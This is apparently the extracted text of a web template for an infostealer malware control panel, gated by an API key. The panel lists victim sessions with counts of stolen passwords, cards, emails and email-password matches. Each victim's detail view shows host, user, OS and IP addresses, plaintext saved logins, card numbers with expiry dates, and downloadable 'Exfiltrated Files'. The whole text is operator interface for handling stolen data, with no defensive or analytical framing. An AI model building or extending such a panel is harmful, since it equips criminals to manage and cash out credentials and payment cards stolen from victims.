API Key
Sessions
{{ stats.total_sessions }}
Passwords
{{ stats.total_logins }}
Cards
{{ stats.total_cards }}
Emails
{{ stats.total_emails }}
Matches
{{ stats.total_matches }}
Files
{{ stats.total_files }}
Latest session
{{ stats.latest_session || '—' }}
Sessions
{{ sessions.length }} records
Session ID Created Logins Cards Emails Matches Files
{{ s.id }} {{ formatDate(s.created_at) }} {{ s.login_count }} {{ s.card_count }} {{ s.email_count }} {{ s.match_count }} {{ s.file_count }}
Awaiting connection
Enter your API key to initialise the data stream
Session Detail {{ detail.session.id }}
System
Host {{ detail.session.system_info.hostname }}
User {{ detail.session.system_info.username }}
OS {{ detail.session.system_info.os }}
Ext IP {{ detail.session.system_info.external_ip || 'N/A' }}
Int IP {{ detail.session.system_info.internal_ip }}
📧 Emails ({{ filteredEmails.length }}) Filtered
No emails found
🔗 Email-Password Matches ({{ detail.matches.length }})
No email-password matches found
email {{ m.email }} site {{ m.site }} pass {{ m.password }}
🔑 Saved Logins ({{ detail.logins.length }})
{{ l.site }}
user {{ l.username }}
pass {{ l.password || '(empty)' }}
💳 Cards ({{ detail.cards.length }})
{{ c.name_on_card || 'No name' }}   [{{ c.card_type || 'Unknown' }}]
{{ c.masked_card_number || c.card_number || '****' }}
Exp: {{ c.exp_month }}/{{ c.exp_year }}
📁 Exfiltrated Files ({{ detail.files.length }})
{{ f.filename }}
{{ (f.size / 1024).toFixed(1) }} KB
↓ Download
{{ errorMsg }}